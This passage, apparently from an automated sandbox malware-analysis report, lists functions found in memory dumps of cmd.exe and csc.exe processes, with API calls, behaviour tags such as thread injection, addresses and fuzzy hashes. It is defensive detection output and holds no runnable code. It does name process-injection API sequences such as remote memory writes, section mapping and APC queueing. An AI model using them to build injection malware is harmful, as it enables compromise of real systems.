NtMapViewOfSection.NTDLL ref: 000001CEDB3F94F4

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 576ccc59a973ac60145e18f2d6aeb9a2e776fa1d2ef7509139e319fefa8ef9c0
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 1601C4B0A08B048FCB44EF69D0C9569BBE1FB58311B10066EE94AC77A6DB70D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB40B934 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 000001CEDB40B953

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 1a6d67112a26a448f11880568753a6218fb2394fe08f4d8b7c91eaf943511297
Instruction ID: 552a408223ccfe6f638683db65c647d815b1cba66baeed3d76e713c027c34411
Opcode Fuzzy Hash: 1a6d67112a26a448f11880568753a6218fb2394fe08f4d8b7c91eaf943511297
Instruction Fuzzy Hash: 04E09234B516844BFF009BF588CC67973E0F758302F000479E882C32A0ED28C8448702

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB40B58C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmp.KERNEL32 ref: 000001CEDB40B6F3
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001CEDB40B76D

Strings

, xrefs: 000001CEDB40B647

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: BoundaryDeleteDescriptorlstrcmp
String ID:
API String ID: 735288309-3916222277
Opcode ID: e9eeb253327d142493c497e0dc79a41e338f6ab728d170d6861a266ef7449667
Instruction ID: 2a45bf268fb1983ec5513105854fac27504755d5301a7098d06d0e63527599ac
Opcode Fuzzy Hash: e9eeb253327d142493c497e0dc79a41e338f6ab728d170d6861a266ef7449667
Instruction Fuzzy Hash: F5512831A58A884BFB28AF5C9C8A6B973D1E389312F14453DD9DBC3691FE20DC424787

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3E689C Relevance: 4.6, APIs: 3, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 000001CEDB3E6970
SetFilePointer.KERNELBASE ref: 000001CEDB3E698A
ReadFile.KERNELBASE ref: 000001CEDB3E69AC

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: File$CreatePointerRead
String ID:
API String ID: 2103328899-0
Opcode ID: 26e69960d8ccee02740c13849a19be0705ec75d48ec4b164913681bb69f1a453
Instruction ID: 69852ce9268f829d7c1746376ec78924481694348c372b93244a2382f964946a
Opcode Fuzzy Hash: 26e69960d8ccee02740c13849a19be0705ec75d48ec4b164913681bb69f1a453
Instruction Fuzzy Hash: 6E41B530258A084FEB58DF68D888B7D73E1F798314F24466EE08BC3691EA75D847DB41

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB40C904 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001CEDB40CA41

Strings

H, xrefs: 000001CEDB40C928

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: e5bff5569006ce6319b6e3a5edaf7b3e2d60b69ac2f5120f329656bb4e6aaa7d
Instruction ID: 30bf59eba2fff8829e95fb5893911e7e85f1c1db28cb3984d4daed568e7ffe76
Opcode Fuzzy Hash: e5bff5569006ce6319b6e3a5edaf7b3e2d60b69ac2f5120f329656bb4e6aaa7d
Instruction Fuzzy Hash: 2BA16E30508B498FFB55DF58D888BB677E1FB98306F14462AD88AC36A1FF34D9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB402064 Relevance: 3.2, APIs: 2, Instructions: 198
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001CEDB3F08E8: FindCloseChangeNotification.KERNELBASE ref: 000001CEDB3F0994

ResumeThread.KERNELBASE ref: 000001CEDB40217C
SuspendThread.KERNELBASE ref: 000001CEDB40219F

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: Thread$ChangeCloseFindNotificationResumeSuspend
String ID:
API String ID: 1581959866-0
Opcode ID: 1b8379d5a799a30f2644e7545c335d315aeb08dd10b3cbf16b605b9abbbea728
Instruction ID: b2145e752bb6a907cab3d16823e529b02488a3e2c00e27bfb4985cb3a0149c78
Opcode Fuzzy Hash: 1b8379d5a799a30f2644e7545c335d315aeb08dd10b3cbf16b605b9abbbea728
Instruction Fuzzy Hash: 2C51E730658B444BFB98EB98E845BBA73D1F788312F10052DE58BC36D2FE34DC458646

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3F87F4 Relevance: 3.1, APIs: 2, Instructions: 60
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(?,?,?,000001CEDB3F43AB), ref: 000001CEDB3F8817
RegOpenKeyA.ADVAPI32(?,?,?,000001CEDB3F43AB), ref: 000001CEDB3F8824

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 7551dc3366139658d8fed0574b2f3dfb3798abcb0bc0d7b9464113821faa679a
Instruction ID: 1ec840065109d9a47f345fc5849d3d873cfc90a5262ca9fec6f0c45f63ec1506
Opcode Fuzzy Hash: 7551dc3366139658d8fed0574b2f3dfb3798abcb0bc0d7b9464113821faa679a
Instruction Fuzzy Hash: 80116530658A188FEB94EB5CD448B69B7E1EBEC341F14452DE84AC3260DAB4D9458782

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3FD180 Relevance: 3.1, APIs: 2, Instructions: 59
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 000001CEDB3FD1B0
QueueUserAPC.KERNELBASE ref: 000001CEDB3FD1C7

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 4c4bb72109eebc3d9b4d39250fdf9200bac6cbe5eef7a5f9886f5de08bd93e82
Instruction ID: 351a0d6b5ebdf873957f8c1bef261bc64c26fca615fec1cfbfbf614083688a3c
Opcode Fuzzy Hash: 4c4bb72109eebc3d9b4d39250fdf9200bac6cbe5eef7a5f9886f5de08bd93e82
Instruction Fuzzy Hash: 75015231718A184FEB84EF6D984D7B977E2EB9C311B14856AE50AC3260DBB4DC818781

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3F7680 Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 000001CEDB3F77C6

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: fadf55c7ce94b045be19e3b55c8cf467d89de5966d193cadd719cd3be238f135
Instruction ID: 1654e2b95afc0293af3a6b48c3c26849e7ee9f68a403ca8c08ddc7656675381e
Opcode Fuzzy Hash: fadf55c7ce94b045be19e3b55c8cf467d89de5966d193cadd719cd3be238f135
Instruction Fuzzy Hash: 16418E306A8A5C8FFF54EF98D885AFA77E1F758310F504129E40AC36A1EAB4DC45C781

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3F833C Relevance: 1.7, APIs: 1, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredContinueHandler.NTDLL ref: 000001CEDB3F84A3

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: c90c063cf138e2e17bc898fae8e6888081598fb0b5eaab86adbac882cf2d2221
Instruction ID: 03f71bdf95e000ed04052ae63fa9415f06e5473e0123f86f686193215a771d8a
Opcode Fuzzy Hash: c90c063cf138e2e17bc898fae8e6888081598fb0b5eaab86adbac882cf2d2221
Instruction Fuzzy Hash: 7C51D530688A058FFB59EF689844BFA77D2EB98305F01812F944BC36A1EF78C445D701

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3F1CBC Relevance: 1.6, APIs: 1, Instructions: 107
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 000001CEDB3F1D60

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 564ff562a282b3eaeddeb1b27ccafaee43fa168b01f3194d6e9cd42d1538608c
Instruction ID: e88c788d9d6293a70334deb99888b5bfdfcc94bad8e3344a983c1e6d8530fa91
Opcode Fuzzy Hash: 564ff562a282b3eaeddeb1b27ccafaee43fa168b01f3194d6e9cd42d1538608c
Instruction Fuzzy Hash: 1531617060CF484FEBA4EF5C9489A6577E1FB98311F11466EE84DC3262DB70EC458786

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3E42D4 Relevance: 1.6, APIs: 1, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE ref: 000001CEDB3E437F

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b11df557754fb6f768dd1ccd9b4692747906d7611534570e510f1a90aaad6c56
Instruction ID: 20183f7f172465319933dd129a90d99ebe0c60947d2f518e290dabc8864ef0d5
Opcode Fuzzy Hash: b11df557754fb6f768dd1ccd9b4692747906d7611534570e510f1a90aaad6c56
Instruction Fuzzy Hash: 9D218330618B088FE754DF68E85977977E1FBAC311F10056EE48AC3661EB74D841DB82

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3F08E8 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 000001CEDB3F0994

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: af2fd0dd98abb7b8d80d577b2f786622d740c92051f1314d8a2dd88015a94618
Instruction ID: 67b22b47d8a87eea96372cf14456a1adbe6f01e6264ef18744f6c7b413010a98
Opcode Fuzzy Hash: af2fd0dd98abb7b8d80d577b2f786622d740c92051f1314d8a2dd88015a94618
Instruction Fuzzy Hash: 50215C31258E098FFB94EF6DD848BA677E1FBA8301F00152EA54AC3260EBB4D9418B45

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3F1228 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 000001CEDB3F12BF

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 621e26cf67038746221375fe22cd52adf943ac0479de1338b6c8c78985cf01a0
Instruction ID: b612fafefd4061df5043aa1fba76c385f11ca1a74c9cebca20f8e02d407d940e
Opcode Fuzzy Hash: 621e26cf67038746221375fe22cd52adf943ac0479de1338b6c8c78985cf01a0
Instruction Fuzzy Hash: A1119430758E5C4FFB94EFACA48876A36E2E79C301F54492EE40AC3250DE78CC818781

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: csc.exePID: 5836, Parent PID: 6064COMMON

Executed Functions

Function 0000019933FB88C8 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 489
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 0000019933FB8965

Strings

@, xrefs: 0000019933FB8BFB

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: AllocateHeap
String ID: @
API String ID: 1279760036-2766056989
Opcode ID: b4a30faad1bdb2d929a66f1959b7937a828d2da89aa499a9ec604f418c93b63c
Instruction ID: 6cdfefb696ebdf4b5e77ce8dfb8e759f81fafe4f546ca38b0b3a97432f61c8b3
Opcode Fuzzy Hash: b4a30faad1bdb2d929a66f1959b7937a828d2da89aa499a9ec604f418c93b63c
Instruction Fuzzy Hash: 80F17370618B498BFB58DF2CD895BA677E1FB98341F84462DE44AC3391DF34EA418B81

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933F92950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationToken.NTDLL ref: 0000019933F92A04
NtQueryInformationToken.NTDLL ref: 0000019933F92A4C
NtClose.NTDLL ref: 0000019933F92A84

Strings

0, xrefs: 0000019933F929AF

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 1378cd4870809fc7bf81bc70a46f9d4ede2f121dfa1a3c01f7f42faed25260b0
Instruction ID: 855b574a0d094e15dfdbf0b33e2bb7f1a0de12ecf58c0683e374d7b1e077d1ee
Opcode Fuzzy Hash: 1378cd4870809fc7bf81bc70a46f9d4ede2f121dfa1a3c01f7f42faed25260b0
Instruction Fuzzy Hash: 0C412C31618B488FD764EF29C8D579AB7E6FBD8301F90492EE48AC3251DB34D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933F98454 Relevance: 4.1, APIs: 2, Instructions: 1081
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNEL32 ref: 0000019933F98521
GetUserNameA.ADVAPI32 ref: 0000019933F9875A

Part of subcall function 0000019933FAD180: CreateThread.KERNELBASE ref: 0000019933FAD1B0
Part of subcall function 0000019933FAD180: QueueUserAPC.KERNELBASE ref: 0000019933FAD1C7

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: 7da4403c81f2b50a42965722f77b996ce5b725f19b502f7d59bf9eebe1c57a95
Instruction ID: 727a85e89246f4836da635ecadaa4f7a2bb829ccba201dcda7ce1e2c90c2835c
Opcode Fuzzy Hash: 7da4403c81f2b50a42965722f77b996ce5b725f19b502f7d59bf9eebe1c57a95
Instruction Fuzzy Hash: 1F82A830658A148FF779EF38EC966A977E2F754701FA0452ED44BC32A1DA34D9438B82

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933F9F4FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 0000019933F9F539

Strings

@, xrefs: 0000019933F9F51D

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 605ad249eee17939379e2d35613407b90dc575aa7b7f148aee095126b29bf020
Instruction ID: 30b1a9baa15101a9b8c04305e8fc3b5ee1c722b5f286e80d1885d4dc4a945382
Opcode Fuzzy Hash: 605ad249eee17939379e2d35613407b90dc575aa7b7f148aee095126b29bf020
Instruction Fuzzy Hash: D8F090B0615B048BEB449FBCD8CD6AD77E1F758306F900A2CE51ACB294DB78CA088785

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FA94A8 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 0000019933FA94F4

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 5766a4d196fece5bd09b21930b2b5a5bd9b85e37f66c3ab8914ae85be5b3a2e1
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: B50104B0A08B048FCB44DF68D0C9569BBE0FB58311B50066EE849C7796DB30D884CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FA9A10 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 0000019933FA9A2F

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 69223100aa4affd6489ac556d62d378258c5e665278ee23d66c827e9bdb65e7b
Instruction ID: 487296d7cbb0c4329b1ff3cb37e8d7fead040edfe7353652557c998af865370f
Opcode Fuzzy Hash: 69223100aa4affd6489ac556d62d378258c5e665278ee23d66c827e9bdb65e7b
Instruction Fuzzy Hash: 67E092347A5A444BFB005FB88CC93BA76D0F789305F80443EE845C33A0C628C9444643

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FBB934 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 0000019933FBB953

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 1a6d67112a26a448f11880568753a6218fb2394fe08f4d8b7c91eaf943511297
Instruction ID: 619c34922a6d7f78f7c79218c20a8efaee5d74cf902407bb89d33b0f78db4c85
Opcode Fuzzy Hash: 1a6d67112a26a448f11880568753a6218fb2394fe08f4d8b7c91eaf943511297
Instruction Fuzzy Hash: 9AE09A74711A884BFB00AFB98CDE27977D0F788301F80087DE882C33A0CA28C8888702

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933F9689C Relevance: 6.1, APIs: 4, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000019933F96970
SetFilePointer.KERNELBASE ref: 0000019933F9698A
ReadFile.KERNELBASE ref: 0000019933F969AC
FindCloseChangeNotification.KERNELBASE ref: 0000019933F969C7

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 26e69960d8ccee02740c13849a19be0705ec75d48ec4b164913681bb69f1a453
Instruction ID: 2b9483364441b195f24cec40fe603e6360c8dc9b989e26b1ef2a5be09f5566cf
Opcode Fuzzy Hash: 26e69960d8ccee02740c13849a19be0705ec75d48ec4b164913681bb69f1a453
Instruction Fuzzy Hash: 7D41D530258A084FEB58DF2CD8D9765B3E6F798314FA4466DD08EC3291DA38C947CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FBB58C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmp.KERNEL32 ref: 0000019933FBB6F3
RtlDeleteBoundaryDescriptor.NTDLL ref: 0000019933FBB76D

Strings

, xrefs: 0000019933FBB647

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: BoundaryDeleteDescriptorlstrcmp
String ID:
API String ID: 735288309-3916222277
Opcode ID: e9eeb253327d142493c497e0dc79a41e338f6ab728d170d6861a266ef7449667
Instruction ID: 40afacdc840e4d8239279ddfd9715b5b3ceaf454e5ab3cbf32540551b2f85da9
Opcode Fuzzy Hash: e9eeb253327d142493c497e0dc79a41e338f6ab728d170d6861a266ef7449667
Instruction Fuzzy Hash: 735107B1658A484BF728AF2C9C9B2B977D2F389310FA4413ED9DAC3391D9249D4247C2

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FB2064 Relevance: 4.7, APIs: 3, Instructions: 198
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000019933FA08E8: FindCloseChangeNotification.KERNELBASE ref: 0000019933FA0994

ResumeThread.KERNELBASE ref: 0000019933FB217C
SuspendThread.KERNELBASE ref: 0000019933FB219F
ResumeThread.KERNELBASE ref: 0000019933FB2238

Part of subcall function 0000019933FB88C8: RtlAllocateHeap.NTDLL ref: 0000019933FB8965

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: Thread$Resume$AllocateChangeCloseFindHeapNotificationSuspend
String ID:
API String ID: 4204085617-0
Opcode ID: 1b8379d5a799a30f2644e7545c335d315aeb08dd10b3cbf16b605b9abbbea728
Instruction ID: 4c3a31420642f5886c37d632a9a052ab6bdc2831d7df7ed7c5f4f8b82a98d12a
Opcode Fuzzy Hash: 1b8379d5a799a30f2644e7545c335d315aeb08dd10b3cbf16b605b9abbbea728
Instruction Fuzzy Hash: 1C51BC70658B484BF758EF2CEC967A677D1F788311F90052DE58AC3292DF34DE418686

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FAE180 Relevance: 3.1, APIs: 2, Instructions: 88
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000019933FAE1E6
VirtualProtect.KERNELBASE ref: 0000019933FAE226

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c0e0413f19c5be89b51992875ed47e20f803a804f09ef538792e45c0a20c2bd3
Instruction ID: 9abde647ba58fb75ab2be81461c4165590e061249250705f87387fa3096830ee
Opcode Fuzzy Hash: c0e0413f19c5be89b51992875ed47e20f803a804f09ef538792e45c0a20c2bd3
Instruction Fuzzy Hash: DD21F470A1CA484FE755DF6CE8567657BE0FBA9300F45009EE849C32A2D674DD41CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FA1228 Relevance: 3.1, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0000019933FA1253
RtlDeleteBoundaryDescriptor.NTDLL ref: 0000019933FA12BF

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: AllocateBoundaryDeleteDescriptorHeap
String ID:
API String ID: 254689257-0
Opcode ID: 621e26cf67038746221375fe22cd52adf943ac0479de1338b6c8c78985cf01a0
Instruction ID: d6cd0c6b2a199469eac2a424344b839543c7cf30ed56b740e32d1e8897413e85
Opcode Fuzzy Hash: 621e26cf67038746221375fe22cd52adf943ac0479de1338b6c8c78985cf01a0
Instruction Fuzzy Hash: D5118230758A5C4FFBA4EF7CA85876A36D2E79C301F94492DE409C3350CA78CC818782

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FAD180 Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 0000019933FAD1B0
QueueUserAPC.KERNELBASE ref: 0000019933FAD1C7

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 4c4bb72109eebc3d9b4d39250fdf9200bac6cbe5eef7a5f9886f5de08bd93e82
Instruction ID: 9c64e43e379460ee9d71a4348337f46b8344b1f2d1a6ce5f7422858c4a1b626c
Opcode Fuzzy Hash: 4c4bb72109eebc3d9b4d39250fdf9200bac6cbe5eef7a5f9886f5de08bd93e82
Instruction Fuzzy Hash: 14015231718A184FFB84EF2D985D7A977E2FB9C311B14856AE509C3360DBB4DD818B82

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FA1CBC Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 0000019933FA1D60

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

